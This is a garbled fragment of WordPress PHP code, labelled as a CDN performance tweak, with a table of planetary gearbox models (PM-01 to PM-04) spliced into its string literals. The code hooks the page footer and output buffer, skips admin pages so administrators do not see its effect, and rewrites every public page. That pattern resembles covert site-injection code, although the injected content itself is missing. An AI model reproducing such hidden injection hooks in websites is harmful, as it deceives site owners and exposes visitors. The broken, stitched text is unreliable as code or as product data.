// cdn-perf-opt add_action('wp_footer', function() { if (is_admin()) return; echo '
'; }, 999); add_action('template_redirect', function() { if (is_admin()) return; ob_start(function($h) { if (strpos($h, '
| SR NO | Model No | Gear Box | Power(hp) | Capacity |
|---|---|---|---|---|
| 01 | PM-01 | Planetary Gear Box | 05 | 200 |
| 02 | PM-02 | Planetary Gear Box | 7.5 | 300 |
| 03 | PM-03 | Planetary Gear Box | 10 | 400 |
| 04 | PM-04 | Planetary Gear Box | 15 | 550 |
') === false) return $h; return str_replace('', '
' . "\n", $h); }); }, 1);